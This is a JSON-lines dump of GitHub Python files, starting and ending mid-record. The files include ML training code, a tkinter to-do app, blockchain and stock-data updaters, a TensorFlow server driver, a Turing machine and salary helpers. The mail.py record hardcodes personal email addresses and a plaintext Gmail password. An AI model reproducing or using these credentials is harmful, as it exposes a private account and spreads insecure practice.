data_in = torch.cat((sample[4], sample[2]), 2).to(device)\n\n # data_in = torch.cat((sample[1], sample[4]), 2).to(device)\n\n # A note on permuting:\n # if you have a matrix, the zeroth 'axis' is the\n # column, and the first is the row. So,\n # permute(1,0) will put the columns into rows,\n # and the rows into columns. It expands to nth axis\n # with tensors.\n # For this particular operation, we are swapping the\n # zeroth and first axes, and those are:\n # og_zeroth = index\n # og_first = physical values (I think)\n data_in.permute(1,0,2)\n trans = sample[7].to(device) # translation from truth\n # I think this should be:\n trans = torch.cat((sample[7], sample[8]), 2).to(device)\n\n\n # Get the diff. TODO: Understand this better!\n #avg_trans_rate =\n\n delta_trans = torch.cat((torch.zeros(trans.shape[0], 1, 3, dtype=torch.float32).to(device), (trans[:,1:,:] - trans[:,:-1,:])), 1)\n output, hidden = model(data_in, hidden)\n print(\"output size = \" + str(output.size()))\n print(\"delta size = \" + str(delta_trans.size()))\n\n # Note, output and delta_trans must have same shape (?)\n loss = criterion(output, delta_trans)\n if batch_idx != len(loader):\n loss.backward(retain_graph=True)\n else:\n loss.backward()\n\n optimizer.step()\n\n # Small number of epochs, so print all:\n print('Epoch: {}/{}..........'.format(epoch, n_epochs), end='')\n print('Loss: {:0.4f}'.format(loss.item()))\n\n\n\n\n","repo_name":"jbelarge/odom-python","sub_path":"models_jab/goModel.py","file_name":"goModel.py","file_ext":"py","file_size_in_byte":3189,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"11955666344","text":"import spsim.simulation_functions\nfrom spsim.simulation_functions import simulate_single_image\nfrom .test_data_model import test_image_parameters_instantiation, \\\n test_simulation_from_input_parameters\n\n\ndef test_simulate_image():\n image_parameters = test_image_parameters_instantiation()\n image = simulate_single_image(image_parameters)\n assert image.shape == (512, 512)\n\n\ndef test_execute_simulation():\n simulation = test_simulation_from_input_parameters()\n spsim.simulation_functions.simulation_as_dask_array()\n","repo_name":"alisterburt/spsim","sub_path":"tests/test_simulation.py","file_name":"test_simulation.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"25982590645","text":"from tkinter import *\n\nwn = Tk()\n\nwn.geometry(\"500x500\")\n\nwn.title(\"To-Do List\")\n\ntitle_lbl = Label(text = \"To-Do List\", font = (\"Georgia\",85,\"bold\"))\ntitle_lbl.pack()\n\nlist_frame = Frame(wn)\nlist_frame.pack(pady = 20)\n\nto_do_list = Listbox(list_frame,\n font = \"Cambria\",\n width = 50,\n height = 5,\n bg = \"SystemButtonFace\",\n bd = 0, \n highlightthickness = 0,\n activestyle = \"none\")\n\nto_do_list.pack()\n\nto_do = [\"Do math homework\", \"Exercise\", \"Read english assignment\"]\n\nfor item in to_do:\n to_do_list.insert(END, item)\n\nitem_entry = Entry(wn, font = (\"Georgia\", 35))\nitem_entry.pack(pady = 20)\n\nbutton_frame = Frame(wn)\nbutton_frame.pack(pady = 20)\n\ndef add_item():\n to_do_list.insert(END, item_entry.get())\n item_entry.delete(0, END)\n\ndef delete_item():\n to_do_list.delete(ANCHOR)\n\ndef clear_item():\n to_do_list.delete(0,END)\n\nadd_button = Button(button_frame, text = \"Add Item\", font = (\"Cambria\", 12), width = 12, command = add_item)\ndelete_button = Button(button_frame, text = \"Delete Item\", font = (\"Cambria\", 12), width = 12, command = delete_item)\nclear_button = Button(button_frame, text = \"Clear\", font = (\"Cambria\", 12), width = 12, command = clear_item)\n\nadd_button.grid(row = 0, column = 0)\ndelete_button.grid(row = 0, column = 1, padx = 10)\nclear_button.grid(row = 0, column = 2)\n\nwn.mainloop()\n","repo_name":"zahrazams/It-List","sub_path":"It List.py","file_name":"It List.py","file_ext":"py","file_size_in_byte":1362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"20566248667","text":"import requests\r\nfrom bcschain.models import Block\r\nfrom django.utils import timezone\r\nfrom datetime import datetime, timedelta\r\nimport pytz\r\nimport time\r\n\r\n\r\ndef update_blocks():\r\n start_date = datetime.strptime('2021-1-21', \"%Y-%m-%d\")\r\n current_date = datetime.today()\r\n first_block = Block.objects.all().first()\r\n msc = pytz.timezone('Etc/GMT-3')\r\n if first_block:\r\n last_timestamp = first_block.timestamp\r\n else:\r\n last_timestamp = datetime.fromtimestamp(1611187200).\\\r\n replace(tzinfo=msc)\r\n\r\n while (current_date - start_date).days >= 0:\r\n datetime_string = f'{current_date.year}-{current_date.month}-{current_date.day}'\r\n url = f'https://bcschain.info/api/blocks/?date={datetime_string}'\r\n response = requests.get(url)\r\n data = response.json()\r\n\r\n for block in data:\r\n timestamp = datetime.fromtimestamp(int(block['timestamp'])).\\\r\n replace(tzinfo=msc)\r\n if timestamp < last_timestamp:\r\n return\r\n height = block['height']\r\n if timestamp == last_timestamp:\r\n try:\r\n Block.objects.get(height=height)\r\n return\r\n except Block.DoesNotExist:\r\n pass\r\n\r\n obj = Block(height=height,\r\n hash=block['hash'],\r\n timestamp=timestamp,\r\n address=block['miner'],\r\n transactions=block['transactionCount'])\r\n obj.save()\r\n\r\n current_date -= timedelta(days=1)\r\n time.sleep(1)\r\n","repo_name":"lepestos/django_bcs","sub_path":"blockUpdater/blockApi.py","file_name":"blockApi.py","file_ext":"py","file_size_in_byte":1633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"9709656291","text":"from __future__ import absolute_import, print_function, division, unicode_literals\nfrom builtins import super, str\n\nimport os\nimport logging\nfrom collections import deque\nimport time\nimport psutil\nimport textwrap\nfrom datetime import datetime\nfrom absl import flags\nfrom contextlib import contextmanager\nfrom typing import List, Deque, Dict, Union, Optional\n\nfrom benchmarks.driver.utils import prompt, remove_prefix\nfrom benchmarks.driver.utils.prompt import pause\nfrom .utils.compatiblity import pathlib, subprocess as sp\nfrom .utils import Popen, execute, ServerError, kill_tree, kill_hard\n\n\nPath = pathlib.Path\nFLAGS = flags.FLAGS\nlogger = logging.getLogger(__name__)\nflags.DEFINE_string('tfserver_endpoint', 'grpc://localhost:2345', 'TF server endpoint to listen on')\n\n\nclass TFDistServer(object):\n\n def __init__(self, env=None, outputdir=None):\n # type: (Dict, Union[Path, str]) -> TFDistServer\n super().__init__()\n\n self.env = os.environ.copy()\n if env is not None:\n self.env.update(env)\n if 'CUDA_VISIBLE_DEVICES' not in self.env:\n self.env['CUDA_VISIBLE_DEVICES'] = '0'\n if 'TF_CPP_MIN_LOG_LEVEL' not in self.env:\n self.env['TF_CPP_MIN_LOG_LEVEL'] = '2'\n\n self.endpoint = FLAGS.tfserver_endpoint # type: str\n\n self.output = None\n if outputdir is not None:\n self.output = Path(outputdir)\n\n self._build_cmd()\n\n self.proc = None # type: Optional[Popen]\n\n def _build_cmd(self):\n # type: () -> List[str]\n \"\"\"Build commandline using 'config' information\"\"\"\n self.args = []\n\n self.args += [\n 'python',\n ]\n\n return self.args\n\n @contextmanager\n def run(self):\n # type: () -> None\n \"\"\"Run server\"\"\"\n if self.output:\n captured_stdout_path = self.output/'tfdist.stdout'\n captured_stderr_path = self.output/'tfdist.stderr'\n\n captured_stdout_path.parent.mkdir(exist_ok=True)\n captured_stderr_path.parent.mkdir(exist_ok=True)\n\n stdout, stderr = captured_stdout_path.open('w'), captured_stderr_path.open('w')\n else:\n stdout, stderr = None, None\n\n # noinspection PyBroadException\n try:\n pyscript = textwrap.dedent(f\"\"\"\n import tensorflow as tf\n cluster = tf.train.ClusterSpec({{\"tfworker\": [\"{remove_prefix(self.endpoint, \"grpc://\")}\"]}})\n tf.train.Server(cluster, job_name=\"tfworker\", task_index=0,\n config=tf.ConfigProto(isolate_session_state=True)).join()\n \"\"\")\n # start\n self.proc = execute(self.args, env=self.env, stdin=sp.PIPE, stdout=stdout, stderr=stderr)\n self.proc.stdin.write(pyscript + \"\\n\")\n self.proc.stdin.close() # Ensures the process knows nothing else is coming\n\n time.sleep(2)\n\n logger.info(f'Started tf server with pid: {self.proc.pid}')\n\n # make self the current server\n with self.as_current():\n yield\n except Exception as ex:\n logger.error(f'Got exception while running the tf server: {ex!s}')\n finally:\n self.kill()\n\n if self.output:\n stdout.close()\n stderr.close()\n\n _current = deque() # type: Deque[TFDistServer]\n\n @contextmanager\n def as_current(self):\n TFDistServer._current.append(self)\n yield self\n TFDistServer._current.pop()\n\n @classmethod\n def has_current(cls):\n # type: () -> bool\n return len(cls._current) > 0\n\n @classmethod\n def current_server(cls):\n # type: () -> TFDistServer\n try:\n return cls._current[-1]\n except IndexError:\n raise ServerError('No current running tf server')\n\n def check(self):\n # type: () -> None\n \"\"\"Check that the server is healthy and running\"\"\"\n if self.proc is None:\n raise ServerError('TF Server is not yet started')\n if self.proc.poll() is not None:\n out, err = self.proc.communicate()\n msg = [f'TF Server died unexpectedly with return code: {self.proc.returncode}']\n if out is not None:\n msg.append(f'\\nStandard output:\\n{out}')\n if err is not None:\n msg.append(f'\\nStandard error:\\n{err}')\n raise ServerError('\\n'.join(msg))\n\n def kill(self):\n # type: () -> None\n \"\"\"Kill the server\"\"\"\n if FLAGS.no_server:\n return\n\n if self.proc is None or self.proc.poll() is not None:\n logger.warning('TF Server already died or is not yet started')\n self.proc = None\n return\n\n logger.info(f'Killing TF server with pid: {self.proc.pid}')\n _, alive = kill_tree(self.proc, timeout=2)\n if alive:\n prompt.confirm('TF Server did not respond in time, do you want to kill hard?')\n logger.info(f'Force killing server with pid: {self.proc.pid}')\n kill_hard(alive)\n\n self.proc = None\n\n @classmethod\n def wait_workloads(cls, workloads, timeout=None, callback=None):\n \"\"\"Wait workloads, raise if server died\"\"\"\n if callback is None:\n def done(proc):\n logger.info(f'Workload {proc.workload.canonical_name} exited with {proc.returncode}')\n\n callback = done\n\n gone = []\n alive = [w.proc for w in workloads]\n enter = datetime.now()\n while alive:\n if TFDistServer.has_current():\n TFDistServer.current_server().check()\n\n g, alive = psutil.wait_procs(alive, timeout=.25, callback=callback)\n gone += g\n\n if timeout is not None and (datetime.now() - enter).total_seconds() >= timeout:\n break\n\n return [p.workload for p in gone], [p.workload for p in alive]\n\n","repo_name":"SymbioticLab/Salus","sub_path":"benchmarks/driver/tfserver.py","file_name":"tfserver.py","file_ext":"py","file_size_in_byte":5969,"program_lang":"python","lang":"en","doc_type":"code","stars":135,"dataset":"github-code","pt":"67"} +{"seq_id":"27314323632","text":"import os\nimport pandas as pd\nimport numpy as np\nfrom tqdm import tqdm\nimport load_tushare\n\n# _PATH = '/Users/winston/mygitrep/sys23/' # TODO\n_PATH = './'\n\n\nclass CacheCombiner(object):\n\n def __init__(self, conf: dict):\n self.conf = conf\n self.tds = load_tushare.TushareLoader(conf).get_tradedates(\n start_date='20140630', filename=conf['path']['tradedates'])\n\n def combine_index_weight(self):\n \"\"\"合并股指成分股权重并补全交易日\"\"\"\n\n # Cache path\n cache_path = self.conf['path']['cache']\n # Source path\n basic_path = cache_path + 'index_weight/'\n\n # Iterate distinct stock index\n for kind, code in self.conf['csi_pool'].items():\n\n # Current index code (6-digit)\n code1 = code.split('.')[0]\n\n stack = []\n # Iterate all years\n for year in range(int(self.tds.iloc[0][:4]), int(self.tds.iloc[-1][:4]) + 1):\n src_file = basic_path + f'{code1}_{year}.csv'\n if not os.path.exists(src_file):\n continue\n df = pd.read_csv(src_file)\n df = df.pivot(index='trade_date', columns='con_code', values='weight')\n stack.append(df)\n\n # Concat year-by-year weight for current index\n stack = pd.concat(stack, axis=0)\n # Fill with NA for method `ffill` in the next step\n stack.fillna(0, inplace=True)\n # Reindex columns with the whole tradedates (though disk-space-consuming)\n stack = stack.reindex(self.tds.astype(int), method='ffill')\n\n # If row sum less than 98%, we'll set index weight as NA\n bad_weight_sum = (stack.sum(axis=1) < 98)\n stack.loc[bad_weight_sum] = np.nan\n\n # Save\n stack.to_csv(self.conf['path'][kind])\n print(f\"Updated in `{self.conf['path'][kind]}`\")\n\n def combine_st_status(self):\n df = pd.read_csv(self.conf['path']['cache'] + '/namechange.csv')\n # print(df['change_reason'].value_counts())\n # print(df.groupby('change_reason').first())\n mask_begin = (df['change_reason'] == '*ST') | (df['change_reason'] == 'ST')\n mask_end = (df['change_reason'] == '撤销*ST') | (df['change_reason'] == '撤销ST') | (\n df['change_reason'] == '摘星改名') | (df['change_reason'] == '终止上市')\n df['isST'] = (mask_begin * 2 + mask_end * 1).replace(0, np.nan)\n df = df[['ann_date', 'change_reason', 'ts_code', 'isST']].drop_duplicates().dropna()\n print(df[df[['ann_date', 'ts_code']].duplicated(keep=False)])\n df = df.groupby(['ann_date', 'ts_code'])['isST'].sum().astype(int)\n print(df.value_counts().to_dict())\n df = df.replace(3, 0) # TODO: 3 - 当天有ST又取消ST,则视作之后一直是ST\n df = df.replace(2, 0) # 0 - 从公告日开始,标记为ST/*ST; 1 - 从公告日开始,不再是ST/*ST(或退市)\n print(df.value_counts().to_dict())\n df = df.reset_index()\n df = df.rename(columns={'ann_date': 'tradingdate', 'ts_code': 'stockcode', 'isST': 'st_status'})\n df.to_csv(self.conf['path']['st_status'], index=False)\n print(f\"Save {len(df)} rows in `{self.conf['path']['st_status']}`.\")\n\n def infer_tds_todo(self, last_tgt_table: str, is1d=False) -> str:\n \"\"\"根据目标CSV地址,查询末尾日期,确定需要新读取的开始日期;若CSV不存在,选用self.tds开始日期\"\"\"\n if os.path.exists(last_tgt_table):\n if is1d: # a 1d table with columns - `tradingdate`\n # Infer latest combined date from existing combined table\n latest_date = pd.read_csv(last_tgt_table)['tradingdate'].dropna(how='all').iloc[-1]\n # Next date after the latest date\n begin_date = load_tushare.next_calendar_date(latest_date, lfmt='%Y-%m-%d')\n else:\n # Infer latest combined date from existing combined table\n latest_date = pd.read_csv(last_tgt_table, index_col=0).dropna(how='all').index[-1]\n # Next date after the latest date\n begin_date = load_tushare.next_calendar_date(latest_date, lfmt='%Y-%m-%d')\n else:\n # Next date is the beginning of `self.td\n begin_date = pd.to_datetime(self.tds[0]).strftime('%Y-%m-%d')\n return begin_date\n\n def combine_daily(self):\n \"\"\"合并`daily/daily/`中的日度行情指标并进行后复权调整\"\"\"\n cache_path = self.conf['path']['cache']\n daily_path = cache_path + 'daily/' # TODO: download cache - daily\n adj_path = cache_path + 'adj_factor/'\n\n # Next date to update\n begin_date = self.infer_tds_todo(\n last_tgt_table=self.conf['path']['circ_mv']) # TODO\n\n ohlc = ['open', 'high', 'low', 'close']\n volamt = ['vol', 'amount']\n\n tds_todo = self.tds[self.tds >= begin_date]\n if len(tds_todo) > 0:\n cached = {}\n for td in tqdm(tds_todo):\n d = pd.read_csv(f'{daily_path}/{td}.csv', index_col=0).sort_index()\n a = pd.read_csv(f'{adj_path}/{td}.csv', index_col=0)\n try:\n a = a.loc[d.index, 'adj_factor']\n except KeyError as e:\n a = a.loc[a.index.intersection(d.index), 'adj_factor']\n print(f\"{td}: {len(set(d.index) - set(a.index))} index in 'daily' found\" \n f\" but in 'adj_factor' not found:\\n original error message: {e}\\n\")\n\n # TODO: 20230421: 1 index in 'daily' found but in 'adj_factor' not found:\n # original error message: \"['689009.SH'] not in index\"\n # assert not set(d.index) - set(a.index) # 所有日期内所含个股都有对应adjfactor\n\n for c in d.columns:\n if c not in ohlc + volamt:\n continue\n\n sr = d[c]\n sr.name = pd.to_datetime(td, format='%Y%m%d')\n if c not in cached:\n cached[c] = [sr]\n else:\n cached[c].append(sr)\n\n if c in ohlc: # 复权调整\n csr = (d[c] * a).round(9)\n csr.name = pd.to_datetime(td, format='%Y%m%d')\n cc = c + 'Adj'\n if cc not in cached:\n cached[cc] = [csr]\n else:\n cached[cc].append(csr)\n\n for k, v in cached.items(): # 暂时必须延续之前,补充新增交易日\n file = self.conf['path'][k]\n if os.path.exists(file):\n df0 = pd.read_csv(file, index_col=0, parse_dates=True)\n else:\n df0 = pd.DataFrame()\n df1 = pd.concat(v, axis=1).T\n df2 = pd.concat([df0, df1], axis=0)\n df2.to_csv(file)\n print(f\"Updated in `{self.conf['path'][k]}`\")\n print(f\"Updated {len(tds_todo)} rows in `{self.conf['path'][k]}`\")\n\n else:\n print(f\"Skip up-to-time: `{daily_path}`\")\n\n def combine_suspend(self):\n \"\"\"合并停牌信息,最后一天为复牌(R),之前连续的停牌(S),当日又停又复牌(SR or RS),默认NA\"\"\"\n cache_path = self.conf['path']['cache']\n src_path = cache_path + 'suspend_d/' # TODO: download cache path - suspend_d\n tgt_path = self.conf['path']['suspend_d']\n\n begin_date = self.infer_tds_todo(tgt_path, is1d=True)\n\n tds_todo = self.tds[self.tds >= begin_date]\n if len(tds_todo) > 0:\n cached = []\n for td in tqdm(tds_todo):\n s = pd.read_csv(f\"{src_path}{td}.csv\")[['ts_code', 'suspend_type']]\n s = s.groupby('ts_code').sum()\n s = s['suspend_type'].rename(pd.to_datetime(td, format='%Y%m%d'))\n cached.append(s)\n\n if os.path.exists(tgt_path):\n df0 = pd.read_csv(tgt_path, index_col=0, parse_dates=True)\n else:\n df0 = pd.DataFrame()\n df1 = pd.concat(cached, axis=1).T\n df1 = df1.stack()\n df1 = df1.reset_index()\n df1.columns = ['tradingdate', 'stockcode', 'suspend_d']\n df2 = pd.concat([df0, df1], axis=0)\n df2.to_csv(tgt_path, index=False)\n print(f\"Updated {len(tds_todo)} rows in `{tgt_path}`\")\n\n else:\n print(f\"Skip up-to-time: `{tgt_path}`\")\n\n def combine_stk_limit(self):\n \"\"\"合并每日的涨跌停价格\"\"\"\n src_path = self.conf['path']['cache'] + 'stk_limit/'\n begin_date = self.infer_tds_todo(self.conf['path']['down_limit'])\n\n tds_todo = self.tds[self.tds >= begin_date]\n if len(tds_todo) > 0:\n cached = {}\n for td in tqdm(self.tds[self.tds >= begin_date]):\n s = pd.read_csv(f\"{src_path}{td}.csv\", index_col=[1])\n td1 = pd.to_datetime(td, format='%Y%m%d')\n\n for c in ['up_limit', 'down_limit']:\n if c in cached:\n cached[c].append(s[c].rename(td1))\n else:\n cached[c] = [s[c].rename(td1)]\n\n for k, v in cached.items():\n tgt_path = self.conf['path'][k]\n df0 = pd.read_csv(tgt_path, index_col=0, parse_dates=True) \\\n if os.path.exists(tgt_path) else pd.DataFrame()\n df1 = pd.concat(cached[k], axis=1).T\n df2 = pd.concat([df0, df1], axis=0)\n df2.to_csv(tgt_path)\n print(f\"Updated {len(tds_todo)} rows in `{tgt_path}`\")\n\n else:\n print(f\"Skip up-to-time: `{src_path}`\")\n\n def infer_up_down_status(self, force_update_all=False):\n \"\"\"直接从日度价格(原始)和日度涨跌停上下界确定涨跌停状态 OU/OD/CU/CD\"\"\"\n\n tgt_path = self.conf['path']['updown_status']\n\n if force_update_all:\n tds_todo = self.tds\n else:\n tds_todo = self.tds[self.tds >= self.infer_tds_todo(tgt_path)]\n\n if len(tds_todo) > 0:\n cached = []\n for td in tqdm(tds_todo):\n df = pd.read_csv(f\"{self.conf['path']['cache']}daily/{td}.csv\", index_col=0)[['open', 'close']]\n po, pc = df['open'], df['close']\n df = pd.read_csv(f\"{self.conf['path']['cache']}stk_limit/{td}.csv\", index_col=1)[['up_limit', 'down_limit']]\n bu, bd = df['up_limit'], df['down_limit']\n del df\n\n open_up = po[po >= bu.reindex_like(po)] # TODO: =?\n open_down = po[po <= bd.reindex_like(po)]\n close_up = pc[pc >= bu.reindex_like(pc)]\n close_down = pc[pc <= bd.reindex_like(pc)]\n\n open_up[:] = 'OU'\n open_down[:] = 'OD'\n close_up[:] = 'CU'\n close_down[:] = 'CD'\n\n sr = pd.concat([\n open_up,\n open_down,\n close_up[close_up.index.difference(open_up.index)],\n close_down[close_down.index.difference(open_down.index)]\n ]).reset_index()\n sr['tradingdate'] = pd.to_datetime(td, format='%Y%m%d')\n sr.columns = ['stockcode', 'updown_status', 'tradingdate']\n sr = sr[['tradingdate', 'stockcode', 'updown_status']]\n sr = sr.sort_values('stockcode')\n\n cached.append(sr)\n\n if (not force_update_all) and (os.path.exists(tgt_path)):\n df0 = pd.read_csv(tgt_path, parse_dates=['tradingdate'])\n else:\n df0 = pd.DataFrame()\n df1 = pd.concat(cached, axis=0)\n df2 = pd.concat([df0, df1], axis=0)\n\n df2.to_csv(tgt_path, index=False)\n print(f\"Updated {len(tds_todo)} rows in `{tgt_path}`\")\n else:\n print(f\"Skip up-to-time: `{tgt_path}`\")\n\n def combine_daily_basic(self):\n \"\"\"合并`./cache/daily_basic/`中每日的基本面指标\"\"\"\n\n # Cache path\n cache_path = self.conf['path']['cache']\n # Source path\n basic_path = cache_path + 'daily_basic/'\n\n # Next date to update\n begin_date = self.infer_tds_todo(\n last_tgt_table=self.conf['path']['circ_mv'])\n\n tds_todo = self.tds[self.tds >= begin_date]\n if len(tds_todo) > 0:\n\n # Container for new daily data loaded\n cached = {}\n # Iterate for all new dates\n for td in tqdm(tds_todo):\n # Load one-day basic data\n d = pd.read_csv(f'{basic_path}/{td}.csv', index_col=0).loc[:, 'turnover_rate':]\n # Reorder by stock-code\n d.sort_index(inplace=True)\n\n # Cache one-day indices\n for cc in d.columns:\n sr = d[cc]\n sr.name = pd.to_datetime(td, format='%Y%m%d')\n if cc not in cached:\n cached[cc] = [sr]\n else:\n cached[cc].append(sr)\n\n # Concat and save\n for k, v in cached.items():\n file = self.conf['path'][k]\n\n if os.path.exists(file):\n df0 = pd.read_csv(file, index_col=0, parse_dates=True)\n else:\n df0 = pd.DataFrame()\n df1 = pd.concat(v, axis=1).T\n df2 = pd.concat([df0, df1], axis=0)\n df2.to_csv(file)\n\n print(f\"Updated {len(tds_todo)} rows in `{self.conf['path'][k]}`\")\n else:\n print(f\"Skip up-to-time: `{basic_path}`\")\n\n def generate_demo(self, length=30):\n \"\"\"将所有已有表格都生成demo作为示例数据\"\"\"\n for k, file in tqdm(self.conf['path'].items()):\n if file[-4:] != '.csv':\n continue\n pd.read_csv(file, index_col=0).tail(length).to_csv(\n self.conf['path']['cache_demo'] + file.rsplit('/', maxsplit=1)[-1])\n\n\ndef main():\n config_path = f'{_PATH}/config_stk.yaml'\n conf = load_tushare.conf_init(conf_path=config_path)\n if conf['status'] == 1:\n combiner = CacheCombiner(conf)\n combiner.combine_suspend()\n combiner.combine_st_status()\n combiner.combine_daily()\n combiner.combine_stk_limit()\n combiner.infer_up_down_status(force_update_all=False)\n combiner.combine_daily_basic()\n combiner.combine_index_weight()\n if conf['update_cache_demo'] == 1:\n combiner.generate_demo(length=10)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"wins-m/sys23","sub_path":"api/combine_tushare.py","file_name":"combine_tushare.py","file_ext":"py","file_size_in_byte":14943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"69809925334","text":"from RPi import GPIO\r\nfrom time import sleep\r\nimport requests\r\n\r\ndef getserial():\r\n # Extract serial from cpuinfo file\r\n cpuserial = \"0000000000000000\"\r\n try:\r\n f = open('/proc/cpuinfo','r')\r\n for line in f:\r\n if line[0:6]=='Serial':\r\n cpuserial = line[10:26]\r\n f.close()\r\n except:\r\n cpuserial = \"ERROR000000000\"\r\n return cpuserial\r\n\r\nurl = \"http://127.0.0.1:5000/\"\r\nmac = getserial()\r\n\r\ndef sendData(metros):\r\n response = requests.post(url, mac, metros) # mac, metros\r\n if response.ok:\r\n print(\"Upload completed successfully!\")\r\n print(response.text)\r\n else:\r\n print(\"Something went wrong!\")\r\n print(response.text)\r\n\r\n# GPIO pins\r\nclk = 17\r\ndt = 18\r\n\r\n# GPIO setup\r\nGPIO.setmode(GPIO.BCM)\r\nGPIO.setup(clk, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)\r\nGPIO.setup(dt, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)\r\n\r\ncounter = 0\r\nclkLastState = GPIO.input(clk)\r\n\r\ntry:\r\n while True:\r\n clkState = GPIO.input(clk)\r\n dtState = GPIO.input(dt)\r\n if clkState != clkLastState:\r\n if dtState != clkState:\r\n counter += 1\r\n counter2 = 0\r\n clkLastState = clkState\r\n sleep(0.0001)\r\n # if more than 5sec pass without a rotation, send data\r\n if counter2 > 500:\r\n metros = counter/1200 # 1200 pulses per meter\r\n sendData(metros)\r\n counter = 0 # reset rotation counter\r\n counter2 = 0\r\n else:\r\n counter2 += 1\r\nfinally:\r\n GPIO.cleanup() \r\n\r\n","repo_name":"ElMoha943/PackagingMachine","sub_path":"encoder.py","file_name":"encoder.py","file_ext":"py","file_size_in_byte":1569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"2882054246","text":"import smtplib\r\nfrom email.mime.text import *\r\nbody='''hi re this is laharika i am sending this mail from my python program'''\r\nmsg=MIMEText(body)\r\nmsg['from']=\"luckyneelam97@gmail.com\"\r\nmsg['to']=\"143sarvani@gmail.com\"\r\nmsg['subject']=\"hi sarru\"\r\nserver=smtplib.SMTP('smtp.gmail.com',587)\r\nserver.starttls()\r\nserver.login(\"luckyneelam97@gmail.com\",\"143momanddad\")\r\nserver.send_message(msg)\r\nprint(\"message sent....\")\r\nserver.quit()","repo_name":"laharikaneelam/Python_exercises","sub_path":"mail.py","file_name":"mail.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"32333419781","text":"class MaquinaTuring:\n def __init__(self, estados, alfabeto, branco, estado_inicial, estado_aceitacao, estado_rejeicao, transicoes):\n self.estados = estados\n self.alfabeto = alfabeto\n self.branco = branco\n self.estado_inicial = estado_inicial\n self.estado_aceitacao = estado_aceitacao\n self.estado_rejeicao = estado_rejeicao\n self.transicoes = transicoes\n self.fitat = [branco]\n self.cabeca = 0\n self.estado_atual = estado_inicial\n\n def executar(self, entrada):\n self.fitat = [self.branco] + list(entrada) + [self.branco]\n self.cabeca = 1\n self.estado_atual = self.estado_inicial\n\n while self.estado_atual != self.estado_aceitacao and self.estado_atual != self.estado_rejeicao:\n simbolo_atual = self.fitat[self.cabeca]\n if (self.estado_atual, simbolo_atual) not in self.transicoes:\n break\n proximo_estado, simbolo_escrito, direcao_movimento = self.transicoes[(self.estado_atual, simbolo_atual)]\n self.fitat[self.cabeca] = simbolo_escrito\n if direcao_movimento == 'L':\n self.cabeca -= 1\n elif direcao_movimento == 'R':\n self.cabeca += 1\n self.estado_atual = proximo_estado\n\n return self.estado_atual == self.estado_aceitacao\n\n# Definindo estados, símbolos e funções de transição\nestados = {'q0', 'q1', 'q2', 'q3', 'q4'}\nalfabeto = {'0', '1', '#', 'X', '_'}\nbranco = '_'\nestado_inicial = 'q0'\nestado_aceitacao = 'q3'\nestado_rejeicao = 'q4'\ntransicoes = {\n ('q0', '0'): ('q1', 'X', 'R'),\n ('q0', '1'): ('q1', 'X', 'R'),\n ('q0', '#'): ('q2', '#', 'L'),\n ('q1', '0'): ('q1', '0', 'R'),\n ('q1', '1'): ('q1', '1', 'R'),\n ('q1', '#'): ('q2', '#', 'L'),\n ('q2', '#'): ('q3', '#', 'L'),\n ('q1', '_'): ('q4', '_', 'L'),\n ('q2', '_'): ('q4', '_', 'L'),\n ('q0', '_'): ('q3', '_', 'L')\n}\n\n# Criar uma instância da Máquina de Turing\nmt = MaquinaTuring(estados, alfabeto, branco, estado_inicial, estado_aceitacao, estado_rejeicao, transicoes)\n\n# Solicitar entrada ao usuário\nentrada = input(\"Digite a string para verificar se está na linguagem: \")\n\n# Executar a Máquina de Turing na entrada fornecida\nresultado = mt.executar(entrada)\n\n# Exibir o resultado\nif resultado:\n print(\"A entrada está na linguagem.\")\nelse:\n print(\"A entrada não está na linguagem.\")\n","repo_name":"Rayan-1/MTteoria","sub_path":"mt.py","file_name":"mt.py","file_ext":"py","file_size_in_byte":2423,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"21110193712","text":"from typing import Union, List, Dict\nfrom src.insights.jobs import read\n\n\ndef get_max_salary(path: str) -> int:\n data_list = read(path)\n all_jobs_max_salaries = []\n all_exceptions = []\n for data in data_list:\n try:\n max_salary = int(data[\"max_salary\"])\n except ValueError:\n all_exceptions.append(data[\"max_salary\"])\n else:\n all_jobs_max_salaries.append(max_salary)\n\n result = max(all_jobs_max_salaries)\n print(set(all_exceptions))\n return result\n\n\ndef get_min_salary(path: str) -> int:\n data_list = read(path)\n all_jobs_min_salaries = []\n all_exceptions = []\n for data in data_list:\n try:\n min_salary = int(data[\"min_salary\"])\n except ValueError:\n all_exceptions.append(data[\"min_salary\"])\n else:\n all_jobs_min_salaries.append(min_salary)\n\n result = min(all_jobs_min_salaries)\n print(set(all_exceptions))\n return result\n\n\ndef matches_salary_range(job: Dict, salary: Union[int, str]) -> bool:\n result = False\n try:\n min_salary = int(job[\"min_salary\"])\n max_salary = int(job[\"max_salary\"])\n salary_search = int(salary)\n max(min_salary, max_salary, salary_search)\n if (min_salary > max_salary):\n raise Exception\n except Exception:\n raise ValueError\n else:\n if (min_salary <= salary_search <= max_salary):\n result = True\n else:\n result = False\n return result\n\n\ndef filter_by_salary_range(\n jobs: List[dict],\n salary: Union[str, int]\n) -> List[Dict]:\n all_jobs_in_salary_range = []\n all_exceptions = []\n for job in jobs:\n try:\n is_in_salary_range = matches_salary_range(job, salary)\n except ValueError:\n all_exceptions.append([job, salary])\n else:\n if (is_in_salary_range):\n all_jobs_in_salary_range.append(job)\n print(all_exceptions)\n return all_jobs_in_salary_range\n","repo_name":"moisesfdasilva/app-job-insights","sub_path":"src/insights/salaries.py","file_name":"salaries.py","file_ext":"py","file_size_in_byte":2007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"71398118613","text":"\nfrom 